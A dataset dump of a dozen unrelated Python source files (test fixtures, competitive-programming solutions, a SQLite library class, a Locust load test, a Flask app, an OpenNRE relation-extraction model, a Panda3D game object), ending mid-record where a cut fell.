+{"seq_id":"74584948937","text":"from scan.test.fetch.kube_fetch.test_data.kube_access import HOST_DOC\n\nPODS_LIST = [{\n    \"_id\": \"5aafe39f89f6e7759a516a5f\",\n    \"environment\": \"kube-aci\",\n    \"id\": \"66745de5-1b33-11e8-9d88-00505699cf9e\",\n    \"type\": \"pod\",\n    \"parent_type\": \"pods_folder\",\n    \"labels\": {\n        \"controller-revision-hash\": \"1818740607\",\n        \"app\": \"flannel\",\n        \"pod-template-generation\": \"1\",\n        \"tier\": \"node\"\n    },\n    \"name_path\": \"/kube-aci/Hosts/kub2-aci/Pods/kube-flannel-ds-4bn8q\",\n    \"id_path\": \"/kube-aci/kube-aci-hosts/kub2-aci/kub2-aci-pods/66745de5-1b33-11e8-9d88-00505699cf9e\",\n    \"node_name\": \"kub2-aci\",\n    \"namespace\": \"kube-system\",\n    \"uid\": \"66745de5-1b33-11e8-9d88-00505699cf9e\",\n    \"name\": \"kube-flannel-ds-4bn8q\",\n    \"parent_text\": \"Pods\",\n    \"host\": \"kub2-aci\",\n    \"object_name\": \"kube-flannel-ds-4bn8q\",\n    \"parent_id\": \"kub2-aci-pods\"\n}]\n\n_POD = PODS_LIST[0]\nEXPECTED_VEDGE = {\n    'id': '{}-vedge'.format(HOST_DOC['id']),\n    'host': HOST_DOC['id'],\n    'environment': HOST_DOC['environment'],\n    'name': _POD['name'],\n    'namespace': _POD['namespace'],\n    'node_name': HOST_DOC['id'],\n    'parent_id': '{}-vedges'.format(HOST_DOC['id']),\n    'parent_type': 'vedges_folder'\n}","repo_name":"korenlev/calipso-cvim","sub_path":"scan/test/fetch/kube_fetch/test_data/kube_fetch_vedges.py","file_name":"kube_fetch_vedges.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"70845317896","text":"\"\"\"\n\n\n\n\n    TO BE REMOVED!!!!!!!!!!!!!! (original note: RETIRAR)\n\n\n\n\"\"\"\n\n\nfrom random import randint, uniform\nimport numpy as np\nimport random\n\ndef get_value_set(set, vw):\n    total_value = 0\n    total_weigth = 0\n\n    for i in range(len(set)):\n        if set[i] == 1:\n            v = vw[i][0]\n            w = vw[i][1]\n            total_value += v\n            total_weigth += w\n    return total_value, total_weigth\n\ndef new_matrix(l, c, w, vw):\n    new_m = np.full(c, 0)\n    removed = []\n    weigth = 0\n\n    new_m = grasp(vw, removed, new_m, w)\n\n    return new_m\n\ndef get_value(kps, items):\n    valuer, weigth = 0, 0\n    for i, v in enumerate(items):\n        if kps[i]:\n            valuer += v[0]\n            weigth += v[1]\n    return valuer, weigth\n\ndef grasp(items, removed, m, w):\n    MAX = 0.6\n    MIN = 0.4\n    ALPHA = MAX\n    \n    weigth = 0\n    indexs = list(range(len(items)))\n    rlc = []\n\n    while weigth < w and indexs:\n        rlc = []\n        maxim = max(items[indexs], key=lambda x: (x[0] / x[1]))\n        maxim = maxim[0] / maxim[1]\n        minim = min(items[indexs], key=lambda x: (x[0] / x[1]))\n        minim = 
minim[0] / minim[1]\n\n b = minim + ALPHA * (maxim - minim)\n\n for i in indexs:\n if (items[i][0] / items[i][1]) >= b:\n rlc.append(i)\n\n if rlc:\n selected_c = random.uniform(0, len(rlc) - 1)\n selected_c = rlc[int(selected_c)]\n else:\n break\n\n m[selected_c] = 1\n _, weigth = get_value_set(m, items)\n \n indexs.pop(indexs.index(selected_c))\n\n return m\n\ndef main():\n v_w = [[randint(600, 800), randint(30, 60)] for _ in range(10)]\n max_weight = 170\n\n v_w = sorted(v_w, key=lambda i: i[0] / i[1], reverse=True)\n\n v_w = np.array(v_w)\n\n print(new_matrix(len(v_w), len(v_w), max_weight, v_w))\n\n\nif __name__ == '__main__':\n pass","repo_name":"webclinic017/cut_stock_problem_algorithms","sub_path":"grasp.py","file_name":"grasp.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"2090959656","text":"from modules.Book import Book\r\nfrom modules.const import HEADERSLOWERCASE\r\nfrom modules.search_str_to_dict import search_str_to_dict\r\nimport re\r\nimport sqlite3 as sql\r\n\r\nclass Library:\r\n def __init__(self) -> None:\r\n self.connection = sql.connect(\"data/data.db\")\r\n self.cursor = self.connection.cursor()\r\n self.cursor.execute('''\r\n CREATE TABLE IF NOT EXISTS books (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n title TEXT,\r\n author TEXT,\r\n type TEXT,\r\n tome INTEGER\r\n )\r\n ''')\r\n self.connection.commit()\r\n\r\n \r\n self.key_priority = HEADERSLOWERCASE.copy()\r\n self.reverse = False\r\n\r\n def get_all(self):\r\n query = self.cursor.execute(\"SELECT * FROM books\")\r\n return query.fetchall()\r\n \r\n def get_elt(self, title, author, type, tome):\r\n query = self.cursor.execute(\"SELECT * FROM books WHERE title=? AND author=? AND type=? AND tome=?\",(title, author, type, tome))\r\n return query.fetchall()\r\n \r\n \r\n\r\n def get(self, start:int=-1, limit:int=-1, filter:str=\"\"):\r\n # param check in\r\n try:\r\n start = int(start)\r\n limit = int(limit)\r\n except ValueError:\r\n return [] \r\n \r\n request = \"SELECT * FROM books\"\r\n\r\n reverse = \" DESC\" if self.reverse else \"\"\r\n key_priority_copy = self.key_priority.copy()\r\n key_priority_copy[0] += reverse\r\n key_tmp = \", \".join(key_priority_copy)\r\n\r\n # WHERE\r\n if re.match(\"^[\\w;: ]+$\", filter):\r\n buff = search_str_to_dict(filter)\r\n if buff:\r\n request += \" WHERE \"\r\n i = 0\r\n for key,val in buff.items():\r\n request += \"{} LIKE '{}%' \".format(key,val)\r\n if i < len(buff)-1:\r\n request += \"AND \"\r\n i += 1\r\n\r\n # ORDER BY\r\n request += \" ORDER BY \" + key_tmp\r\n\r\n # LIMIT OFFSET\r\n if start >= 0 and limit >=0:\r\n request += \" LIMIT \" + str(limit) + \" OFFSET \" + str(start)\r\n\r\n query = self.cursor.execute(request)\r\n return query.fetchall()\r\n \r\n def get_key_sort(self):\r\n return self.key_priority[0]\r\n\r\n def is_in(self, book:Book) -> bool:\r\n query = self.cursor.execute(\"SELECT * FROM books WHERE title=? AND author=? AND type=? 
AND tome=?\", (book.title, book.author, book.type, book.tome))\r\n return query.fetchall() != []\r\n\r\n def set_sort_order(self, key:str):\r\n # back to original order\r\n if key in HEADERSLOWERCASE:\r\n self.key_priority = HEADERSLOWERCASE.copy()\r\n self.key_priority.remove(key)\r\n self.key_priority.insert(0, key)\r\n\r\n def set_reverse(self, val:bool):\r\n if val==True or val==False:\r\n self.reverse = val\r\n \r\n def add_books(self, data: list[Book]) -> bool:\r\n \"\"\"\r\n Add multiple books to the database, ignoring duplicates.\r\n\r\n Args:\r\n data (list[Book]): A list of Book objects to be added.\r\n\r\n Returns:\r\n bool: True if all books were added successfully, False if there was an error.\r\n \"\"\"\r\n try:\r\n for book in data:\r\n if isinstance(book, Book):\r\n if not self.is_in(book):\r\n query = \"INSERT INTO books(title, author, type, tome) VALUES (?,?,?,?)\"\r\n parameters = (book.title, book.author, book.type, book.tome)\r\n self.cursor.execute(query, parameters)\r\n else:\r\n return False # Invalid data type in the list\r\n self.connection.commit()\r\n return True\r\n except IndentationError:\r\n self.connection.rollback()\r\n return False\r\n \r\n\r\n def delete_book(self, data: list[Book]) -> bool:\r\n \"\"\"\r\n Delete a book from the database.\r\n\r\n Args:\r\n data (list[Book]): A list of Book objects to be deleted.\r\n\r\n Returns:\r\n bool: True if the books was deleted successfully, False if there was an error.\r\n \"\"\"\r\n try:\r\n for book in data:\r\n if isinstance(book, Book):\r\n if self.is_in(book):\r\n self.cursor.execute(\r\n \"DELETE FROM books WHERE title=? AND author=? AND type=? AND tome=?\",\r\n (book.title, book.author, book.type, book.tome)\r\n )\r\n else:\r\n return False\r\n else:\r\n return False # Invalid data type\r\n self.connection.commit()\r\n return True\r\n except Exception:\r\n self.connection.rollback()\r\n return False\r\n\r\n def update_book(self, old_book: Book, new_book: Book) -> bool:\r\n \"\"\"\r\n Update a book's information in the database.\r\n\r\n Args:\r\n old_book (Book): The existing Book object to be updated.\r\n new_book (Book): The new Book object with updated information.\r\n\r\n Returns:\r\n bool: True if the book was updated successfully, False if there was an error.\r\n \"\"\"\r\n try:\r\n if isinstance(old_book, Book) and isinstance(new_book, Book):\r\n if self.is_in(old_book):\r\n query = \"UPDATE books SET title=?, author=?, type=?, tome=? WHERE title=? AND author=? AND type=? 
AND tome=?\"\r\n parameters = (new_book.title, new_book.author, new_book.type, new_book.tome, old_book.title, old_book.author, old_book.type, old_book.tome)\r\n self.cursor.execute(query, parameters)\r\n self.connection.commit()\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False # Invalid data types\r\n except Exception:\r\n self.connection.rollback()\r\n return False\r\n\r\n def close(self):\r\n self.connection.close()","repo_name":"Baltemor369/manga-library","sub_path":"MangaManager/modules/Library.py","file_name":"Library.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"34113340978","text":"import os\nimport unittest\n\nfrom azure_devtools.scenario_tests import AllowLargeResponse\nfrom .utilities.helper import DevopsScenarioTest, disable_telemetry, set_authentication, get_test_org_from_env_variable\n\nDEVOPS_CLI_TEST_ORGANIZATION = get_test_org_from_env_variable() or 'https://dev.azure.com/devops-cli-test-org'\n\nclass PipelinesBuildTagTests(DevopsScenarioTest): \n @AllowLargeResponse(size_kb=3072)\n @disable_telemetry\n @set_authentication\n def test_build_tag_listAddDelete(self):\n self.cmd('az devops configure --defaults organization=' + DEVOPS_CLI_TEST_ORGANIZATION + ' project=buildtests')\n\n build_definition_name = 'BuildTests Definition1'\n\n #QueueBuild to get a build ID\n queue_build_command = 'az pipelines build queue --definition-name \"' + build_definition_name + '\" --detect false --output json'\n queue_build_output = self.cmd(queue_build_command).get_output_in_json()\n queued_build_id = queue_build_output[\"id\"]\n\n try:\n #Add build tag to queued build\n add_build_tag_command = 'az pipelines build tag add --build-id ' + str(queued_build_id) + ' --tags TestTag0 --detect false --output json'\n add_build_tag_output = self.cmd(add_build_tag_command).get_output_in_json()\n assert len(add_build_tag_output) == 1\n assert add_build_tag_output == ['TestTag0']\n\n #Add build tags to queued build\n add_build_tag_command = 'az pipelines build tag add --build-id ' + str(queued_build_id) + ' --tags \"TestTag1,TestTag2\" --detect false --output json'\n add_build_tag_output = self.cmd(add_build_tag_command).get_output_in_json()\n assert len(add_build_tag_output) == 3\n assert add_build_tag_output == ['TestTag0', 'TestTag1', \"TestTag2\"]\n\n #List build tags added to queued build\n list_build_tag_command = 'az pipelines build tag list --build-id ' + str(queued_build_id) + ' --detect false --output json'\n list_build_tag_output = self.cmd(list_build_tag_command).get_output_in_json()\n assert len(list_build_tag_output) == 3\n assert list_build_tag_output == ['TestTag0', 'TestTag1', \"TestTag2\"]\n\n #Delete build tag from queued build\n delete_build_tag_command = 'az pipelines build tag delete --build-id ' + str(queued_build_id) + ' --tag TestTag2 --detect false --output json'\n delete_build_tag_output = self.cmd(delete_build_tag_command).get_output_in_json()\n assert len(delete_build_tag_output) == 2\n assert delete_build_tag_output == ['TestTag0', 'TestTag1']\n finally:\n #Delete tags added for test\n delete_build_tag_command = 'az pipelines build tag delete --build-id ' + str(queued_build_id) + ' --tag TestTag1 --detect false --output json'\n self.cmd(delete_build_tag_command)\n delete_build_tag_command = 'az pipelines build tag delete --build-id ' + str(queued_build_id) + ' --tag TestTag0 --detect false --output json'\n self.cmd(delete_build_tag_command)\n\n 
#Verify deletion\n            list_build_tag_command = 'az pipelines build tag list --build-id ' + str(queued_build_id) + ' --detect false --output json'\n            add_build_tag_output = self.cmd(list_build_tag_command).get_output_in_json()\n            assert len(add_build_tag_output) == 0","repo_name":"Azure/azure-devops-cli-extension","sub_path":"tests/test_pipelinesBuildTagTest.py","file_name":"test_pipelinesBuildTagTest.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":590,"dataset":"github-code","pt":"45"}
+{"seq_id":"16588155068","text":"import sys\nfrom io import StringIO\nimport unittest\n\n\nclass TestClass(unittest.TestCase):\n    def assertIO(self, input, output):\n        stdout, stdin = sys.stdout, sys.stdin\n        sys.stdout, sys.stdin = StringIO(), StringIO(input)\n        resolve()\n        sys.stdout.seek(0)\n        out = sys.stdout.read()[:-1]\n        sys.stdout, sys.stdin = stdout, stdin\n        self.assertEqual(out, output)\n\n    def test_Sample_Input_1(self):\n        input = \"\"\"3\n2 2 4\"\"\"\n        output = \"\"\"4 0 4\"\"\"\n        self.assertIO(input, output)\n\n    def test_Sample_Input_2(self):\n        input = \"\"\"5\n3 8 7 5 5\"\"\"\n        output = \"\"\"2 4 12 2 8\"\"\"\n        self.assertIO(input, output)\n\n    def test_Sample_Input_3(self):\n        input = \"\"\"3\n1000000000 1000000000 0\"\"\"\n        output = \"\"\"0 2000000000 0\"\"\"\n        self.assertIO(input, output)\n\ndef resolve():\n    # Split the dams into odd- and even-indexed groups and take prefix sums, then:\n    # for an odd-numbered mountain: (odd dams' water above it) - (odd dams' water below it) - (even dams' water above it) + (even dams' water below it)\n    # for an even-numbered mountain: (even dams' water above it) - (even dams' water below it) - (odd dams' water above it) + (odd dams' water below it)\n    N = int(input())\n    A = [int(x) for x in input().split(\" \")]\n    odd_dam = [0]*(N+1)\n    even_dam = [0]*(N+1)\n    for i in range(N):\n        if (i+1)%2:\n            odd_dam[i+1]=A[i]+odd_dam[i]\n            even_dam[i+1]=even_dam[i]\n        else:\n            odd_dam[i+1]=odd_dam[i]\n            even_dam[i+1]=A[i]+even_dam[i]\n    \n    ans = [0]*N\n    for i in range(N):\n        if (i+1)%2:\n            ans[i] = odd_dam[-1] - 2*odd_dam[i] - even_dam[-1] + 2*even_dam[i]\n        else:\n            ans[i] = even_dam[-1] - 2*even_dam[i] - odd_dam[-1] + 2*odd_dam[i]\n    print(*ans)\n\nresolve()\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"TsukasaDEKA/competitive_programing","sub_path":"atcoder/current/ABC/101_200/ABC133/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"}
+{"seq_id":"3655504085","text":"import sys, os, io, atexit\ninput = lambda : sys.stdin.readline().rstrip('\\r\\n')\nstdout = io.BytesIO()\nsys.stdout.write = lambda s : stdout.write(s.encode(\"ascii\"))\natexit.register(lambda : os.write(1, stdout.getvalue()))\nfrom collections import deque\n\nN = int(input())\narr = [[0 for _ in range(N)] for _ in range(N)]\n\nfor i in range(N):\n    arr[i] = list(map(int, input().split()))\n\nvisited = [[0 for _ in range(N)] for _ in range(N)]\n\ndef bfs(x):\n    queue = deque()\n    queue.append(x)\n    check = [0 for _ in range(N)]\n\n    while queue:\n        q = queue.popleft()\n\n        for i in range(N):\n            if check[i] == 0 and arr[q][i] == 1:\n                queue.append(i)\n                check[i] = 1\n                visited[x][i] = 1\n\nfor i in range(N):\n    bfs(i)\n\nfor i in visited:\n    print(*i) ","repo_name":"ellynhan/challenge100-codingtest-study","sub_path":"wlwl1011/BOJ/heybob/1회/11403.py","file_name":"11403.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"45"}
+{"seq_id":"44213287613","text":"with open('input.txt', 'rt') as f:\n    lines = f.read().split('\\n')\n\ndef part1(lines):\n    h, d = 0, 
0\n    for line in lines:\n        cmd, num = line.split(' ')\n        if cmd == 'forward':\n            h += int(num)\n        elif cmd == 'down':\n            d += int(num)\n        elif cmd == 'up':\n            d -= int(num)\n        else:\n            raise ValueError(f'Invalid cmd {cmd}')\n    return h * d\n\ndef part2(lines):\n    h, d, aim = 0, 0, 0\n    for line in lines:\n        cmd, num = line.split(' ')\n        if cmd == 'forward':\n            h += int(num)\n            d += aim * int(num)\n        elif cmd == 'down':\n            aim += int(num)\n        elif cmd == 'up':\n            aim -= int(num)\n        else:\n            raise ValueError(f'Invalid cmd {cmd}')\n    return h * d\n\nprint(f'Part1: {part1(lines)}')\nprint(f'Part2: {part2(lines)}')","repo_name":"malhotraa/aoc2021","sub_path":"day2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"}
+{"seq_id":"71800182537","text":"from locust import HttpLocust, TaskSet, task\n\n\nclass FlowException(Exception):\n    pass\n\n\nclass UserBehavior(TaskSet):\n    @task(1)\n    def check_flow(self):\n        # step 1\n        new_post = {'userId': 1, 'title': 'my shiny new post', 'body': 'hello everybody'}\n        post_response = self.client.post('/posts', json=new_post)\n        if post_response.status_code != 201:\n            raise FlowException('post not created')\n        post_id = post_response.json().get('id')\n\n        # step 2\n        new_comment = {\n            \"postId\": post_id,\n            \"name\": \"my comment\",\n            \"email\": \"test@user.habr\",\n            \"body\": \"Author is cool. Some text. Hello world!\"\n        }\n        comment_response = self.client.post('/comments', json=new_comment)\n        if comment_response.status_code != 201:\n            raise FlowException('comment not created')\n        comment_id = comment_response.json().get('id')\n\n        # step 3: capture the GET response and check it (the original re-checked the POST response)\n        get_response = self.client.get(f'/comments/{comment_id}', name='/comments/[id]')\n        if get_response.status_code != 200:\n            raise FlowException('comment not read')\n\n\nclass WebsiteUser(HttpLocust):\n    task_set = UserBehavior\n    min_wait = 1000\n    max_wait = 2000\n","repo_name":"Ypurek/performance-sample","sub_path":"locust_files/locust_transaction_test1.py","file_name":"locust_transaction_test1.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"}
+{"seq_id":"17781764707","text":"# Write a Python program which gets a string from the commandline argument and write a\n# function to count the number of occurrences of a specific character in a string.\n\nimport sys\n\n\ndef character_occurs(string, char):\n    count = 0\n    if len(char) > 1:\n        raise Exception(\"The second parameter is not a character!\")\n\n    for c in string:\n        if c == char:\n            count += 1\n    return count\n\n\nif len(sys.argv) < 3:\n    print(\"Provide a string and a character as arguments!\")\n    quit()\n\nc = character_occurs(sys.argv[1], sys.argv[2])\n\nprint(\"The number of occurrences of the character '{}' in the string '{}' is {}\".format(sys.argv[2], sys.argv[1], c))\n","repo_name":"pacifastacus/Programming1","sub_path":"ex03/negyedik.py","file_name":"negyedik.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"}
+{"seq_id":"29931136170","text":"from flask import Flask,render_template,request\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom pipeline.predict_pipeline import CustomData,PredictPipeline\n\n\napplication = Flask(__name__)\napp = application\n@app.route('/')\ndef indeX():\n    return render_template('home.html')\n\n@app.route('/predictdata',methods=['GET','POST'])\ndef 
predict_data():\n    if request.method == 'GET':\n        return render_template('home.html')\n    else:\n        data = CustomData(gender=request.form.get('gender'),\n                          race_ethnicity=request.form.get('ethnicity'),\n                          parental_level_of_education=request.form.get('parental_level_of_education'),\n                          lunch=request.form.get('lunch'),\n                          test_preparation_course=request.form.get('test_preparation_course'),\n                          reading_score=float(request.form.get('reading_score')),\n                          writing_score=float(request.form.get('writing_score')))\n        pred_df = data.data_frame()\n        print(pred_df)\n        print(\"Before Prediction\")\n        predictPipeline = PredictPipeline()\n        print(\"Mid Prediction\")\n        result = predictPipeline.predict(pred_df)\n        print(\"After Prediction\")\n        return render_template('home.html',results=result[0])\n    \n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"Abdul-Basith-R/Student-Performance-Monitoring","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"}
+{"seq_id":"42400709269","text":"import torch\nfrom torch import nn, optim\nfrom .base_model import BagRE\n\nclass BagOne(BagRE):\n    \"\"\"\n    Instance one(max) for bag-level relation extraction.\n    \"\"\"\n\n    def __init__(self, sentence_encoder, num_class, rel2id):\n        \"\"\"\n        Args:\n            sentence_encoder: encoder for sentences\n            num_class: number of classes\n            id2rel: dictionary of id -> relation name mapping\n        \"\"\"\n        super().__init__()\n        self.sentence_encoder = sentence_encoder\n        self.num_class = num_class\n        self.fc = nn.Linear(self.sentence_encoder.hidden_size, num_class)\n        self.softmax = nn.Softmax(-1)\n        self.rel2id = rel2id\n        self.id2rel = {}\n        self.drop = nn.Dropout()\n        for rel, id in rel2id.items():\n            self.id2rel[id] = rel\n\n    def infer(self, bag):\n        \"\"\"\n        Args:\n            bag: bag of sentences with the same entity pair\n                [{\n                  'text' or 'token': ..., \n                  'h': {'pos': [start, end], ...}, \n                  't': {'pos': [start, end], ...}\n                }]\n        Return:\n            (relation, score)\n        \"\"\"\n        self.eval()\n        tokens = []\n        pos1s = []\n        pos2s = []\n        masks = []\n        for item in bag:\n            token, pos1, pos2, mask = self.sentence_encoder.tokenize(item)\n            tokens.append(token)\n            pos1s.append(pos1)\n            pos2s.append(pos2)\n            masks.append(mask)\n        tokens = torch.cat(tokens, 0).unsqueeze(0) # (n, L)\n        pos1s = torch.cat(pos1s, 0).unsqueeze(0)\n        pos2s = torch.cat(pos2s, 0).unsqueeze(0)\n        masks = torch.cat(masks, 0).unsqueeze(0)\n        scope = torch.tensor([[0, len(bag)]]).long() # (1, 2)\n        bag_logits = self.forward(None, scope, tokens, pos1s, pos2s, masks, train=False).squeeze(0) # (N) after softmax\n        score, pred = bag_logits.max(0)\n        score = score.item()\n        pred = pred.item()\n        rel = self.id2rel[pred]\n        return (rel, score)\n    \n    def forward(self, label, scope, token, pos1, pos2, mask=None, train=True, bag_size=0):\n        \"\"\"\n        Args:\n            label: (B), label of the bag\n            scope: (B), scope for each bag\n            token: (nsum, L), index of tokens\n            pos1: (nsum, L), relative position to head entity\n            pos2: (nsum, L), relative position to tail entity\n            mask: (nsum, L), used for piece-wise CNN\n        Return:\n            logits, (B, N)\n        \"\"\"\n        # Encode\n        if bag_size > 0:\n            token = token.view(-1, token.size(-1))\n            pos1 = pos1.view(-1, pos1.size(-1))\n            pos2 = pos2.view(-1, pos2.size(-1))\n            if mask is not None:\n                mask = mask.view(-1, mask.size(-1))\n        else:\n            begin, end = scope[0][0], scope[-1][1]\n            token = token[:, begin:end, :].view(-1, token.size(-1))\n            pos1 = pos1[:, begin:end, :].view(-1, pos1.size(-1))\n            pos2 = pos2[:, begin:end, 
:].view(-1, pos2.size(-1))\n if mask is not None:\n mask = mask[:, begin:end, :].view(-1, mask.size(-1))\n scope = torch.sub(scope, torch.zeros_like(scope).fill_(begin))\n\n if train or bag_size > 0:\n if mask is not None:\n rep = self.sentence_encoder(token, pos1, pos2, mask) # (nsum, H) \n else:\n rep = self.sentence_encoder(token, pos1, pos2) # (nsum, H) \n else:\n rep = []\n bs = 256\n total_bs = len(token) // bs + (1 if len(token) % bs != 0 else 0)\n for b in range(total_bs):\n with torch.no_grad():\n left = bs * b\n right = min(bs * (b + 1), len(token))\n if mask is not None: \n rep.append(self.sentence_encoder(token[left:right], pos1[left:right], pos2[left:right], mask[left:right]).detach()) # (nsum, H) \n else:\n rep.append(self.sentence_encoder(token[left:right], pos1[left:right], pos2[left:right]).detach()) # (nsum, H) \n rep = torch.cat(rep, 0)\n\n # Max\n if train:\n if bag_size == 0:\n bag_rep = []\n query = torch.zeros((rep.size(0))).long()\n if torch.cuda.is_available():\n query = query.cuda()\n for i in range(len(scope)):\n query[scope[i][0]:scope[i][1]] = label[i]\n\n for i in range(len(scope)): # iterate over bags\n bag_mat = rep[scope[i][0]:scope[i][1]] # (n, H)\n instance_logit = self.softmax(self.fc(bag_mat)) # (n, N)\n # select j* which scores highest on the known label\n max_index = instance_logit[:, query[i]].argmax() # (1)\n bag_rep.append(bag_mat[max_index]) # (n, H) -> (H)\n bag_rep = torch.stack(bag_rep, 0) # (B, H)\n bag_rep = self.drop(bag_rep)\n bag_logits = self.fc(bag_rep) # (B, N)\n else:\n batch_size = label.size(0)\n query = label # (B)\n rep = rep.view(batch_size, bag_size, -1)\n instance_logit = self.softmax(self.fc(rep))\n max_index = instance_logit[torch.arange(batch_size), :, query].argmax(-1)\n bag_rep = rep[torch.arange(batch_size), max_index]\n\n bag_rep = self.drop(bag_rep)\n bag_logits = self.fc(bag_rep) # (B, N)\n\n else:\n if bag_size == 0:\n bag_logits = []\n for i in range(len(scope)):\n bag_mat = rep[scope[i][0]:scope[i][1]] # (n, H)\n instance_logit = self.softmax(self.fc(bag_mat)) # (n, N)\n logit_for_each_rel = instance_logit.max(dim=0)[0] # (N)\n bag_logits.append(logit_for_each_rel)\n bag_logits = torch.stack(bag_logits, 0) # after **softmax**\n else:\n batch_size = rep.size(0) // bag_size\n rep = rep.view(batch_size, bag_size, -1)\n bag_logits = self.softmax(self.fc(rep)).max(1)[0]\n\n return bag_logits\n\n","repo_name":"thunlp/OpenNRE","sub_path":"opennre/model/bag_one.py","file_name":"bag_one.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","stars":4131,"dataset":"github-code","pt":"45"} +{"seq_id":"35887872172","text":"def somma(values):\n \"\"\"\n Args:\n values to sum\n Return:\n sum of values\n \"\"\"\n count = 0\n for value in values:\n count+=value\n return count\n\n\ndef media(lista):\n \"\"\"\n Args:\n values for the average\n Return:\n average\n \"\"\"\n sum = somma(lista)\n if len(lista)==0:\n return 0\n else:\n return sum/len(lista)\n","repo_name":"gabrielecosta/python_unipa","sub_path":"es_1/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"4639229020","text":"\r\nfrom pandac.PandaModules import (\r\n\tQuat,OdeBody, OdeMass, OdeBoxGeom, BitMask32)\n\t\nfrom pandac.PandaModules import (CollisionTraverser,\r\n\tCollisionSphere, CollisionNode, NodePath,\r\n\tPandaNode, CollisionHandlerEvent)\r\n\r\nfrom model.SurfaceType import 
SurfaceType\r\n\r\nclass Coin:\r\n\t\"\"\"\r\n\tAn object that a ball collects.\r\n\t\"\"\"\r\n\tMODEL = \"../egg/kolikko.egg\"\r\n\tcollectable = 0\r\n\r\n\tdef __init__(self, model, world, space, pos):\n\t\tself.model = model\r\n\t\tself.world = world\r\n\t\tself.space = space\n\t\tself.collHandEvent = CollisionHandlerEvent()\r\n\t\tself.collHandEvent.addInPattern('into-%in')\r\n\t\tself.addBox(pos)\r\n\t\tself.isCollected = False\r\n\t\tCoin.collectable += 1\r\n \r\n\tdef collect(self):\r\n\t\tif not self.isCollected:\r\n\t\t\tself.isCollected = True\r\n\t\t\tself.box.setColor(1,0,0)\r\n\t\t\tCoin.collectable -= 1\n\n\tdef onCollide(self, entry):\n\t\tbody1 = entry.getFromNodePath()\n\t\tballNode = self.model.getBall().getModelNode()\n\t\tif ballNode and ballNode == body1.getParent():\n\t\t\tself.collect()\n\r\n\tdef addBox(self, pos):\r\n\t\tlx,ly,lz = 1,1,1 # dimension\r\n\t\tpx,py,pz = pos # position\r\n\t\tname = \"box\" + str(pos)\r\n\t\tself.box = loader.loadModel(self.MODEL)\r\n\t\tself.box.setPos(-0.5,-0.5,-0.5)\r\n\t\tself.box.flattenLight() # ApplyTransform\r\n\t\tself.box.reparentTo(render)\r\n\t\t\r\n\t\t# Make sure its center is at 0, 0, 0 like OdeBoxGeom\r\n\t\tself.box.setPos( px -lx/2, py -ly/2, pz -lz/2)\r\n\t\tself.box.setScale( lx, ly, lz )\r\n\t\tself.box.setHpr( 0, 50, 0 )\r\n\t\t\n\t\t# Offset z by -1.0 because the coin model was so small\n\t\tcSphere = CollisionSphere(pos[0], pos[1], pos[2] - 1.0, 1)\r\n\t\tcNode = CollisionNode(name)\r\n\t\tcNode.addSolid(cSphere)\r\n\t\t\r\n\t\tmodel = render.find(name)\r\n\t\tif not model.isEmpty():\r\n\t\t\tmodel.removeNode()\r\n\t\t\t\r\n\t\tcnodePath = render.attachNewNode( cNode )\r\n\t\t#cnodePath.show()\r\n\t\tbase.cTrav.addCollider( cnodePath, self.collHandEvent )\r\n\t\tbase.accept( 'into-' + name, self.onCollide )\n\t\t\n\t\t# Implementation below would not allow coins to float?\r\n\t\t# define mass\r\n\t\t\"\"\"\n\t\tmass = OdeMass()\r\n\t\tmass.setBox(500, lx, ly, lz)\r\n\t\t\r\n\t\tself.boxBody = OdeBody( self.world )\r\n\t\tself.boxBody.setPosition( self.box.getPos(render) )\r\n\t\tself.boxBody.setQuaternion( self.box.getQuat(render) )\r\n\t\tself.boxBody.setMass( mass )\r\n\t\t\r\n\t\tself.geom = OdeBoxGeom( self.space, lx, ly, lz)\r\n\t\tself.space.setSurfaceType( self.geom, SurfaceType.COIN )\r\n\t\tself.geom.setBody( self.boxBody )\n\t\tself.boxBody = None\r\n\t\t\"\"\"\r\n\tdef updateModelNode(self):\n\t\treturn None\n\t\t#None\r\n\t\t#self.box.setPos( render, self.boxBody.getPosition() )\r\n\t\t#self.box.setQuat(render, Quat(self.boxBody.getQuaternion() ) )\r\n\t\r\n\tdef getBody(self):\r\n\t\treturn None\n\t\t#return self.boxBody\r\n\t\r\n\tdef removeNode(self):\r\n\t\tif not self.isCollected:\r\n\t\t\tCoin.collectable -= 1\r\n\t\t# http://www.panda3d.org/apiref.php?page=NodePath#removeNode\r\n\t\tself.box.removeNode()\r\n\r\n","repo_name":"Panda3D-public-projects-archive/bounce3d","sub_path":" 